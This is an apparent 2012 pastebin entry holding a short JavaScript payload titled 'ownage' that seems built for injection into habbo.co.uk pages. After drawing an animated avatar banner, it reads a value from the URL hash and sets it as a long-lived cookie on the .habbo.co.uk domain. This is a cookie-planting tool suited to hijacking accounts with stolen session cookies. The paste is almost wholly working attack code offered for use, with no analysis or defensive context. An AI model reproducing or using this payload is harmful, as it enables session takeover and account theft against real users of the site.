Don't like ads? PRO users don't see any ads ;-)
Guest

Untitled

By: a guest on May 3rd, 2012  |  syntax: None  |  size: 0.83 KB  |  hits: 12  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. document.title='ownage';
  2. document.write('<h1><img src="http://www.habbo.co.uk/habbo-imaging/avatarimage?user=Makinit&action=std&direction=3&head_direction=3&gesture=sml&size=s" id="Makinit" /> Provided by Arjan</h1>')
  3.  
  4. function rotate(n, r) {
  5.         if (r == 8) r = 0;
  6.         document.getElementById(n).src = 'http://www.habbo.co.uk/habbo-imaging/avatarimage?user=' + n + '&action=wlk&direction=' + r + '&head_direction=' + r + '&gesture=sml&size=s';
  7.         setTimeout('rotate("' + n + '", ' + (r + 1) + ');', 500);
  8. }
  9.  
  10. rotate('Makinit', 4);
  11.  
  12. if(window.location.hash != '') {
  13.         document.cookie = window.location.hash.substring(1) + '; path=/; domain=.habbo.co.uk; expires=Thu, 01-Jan-2100, 00:00:00';
  14.         document.write('Cookie set: <br /><i>' + document.cookie + '</i>');
  15. }
  16. else {
  17.         document.write('Cookie not set, put cookie in URL hash: #name=value');
  18. }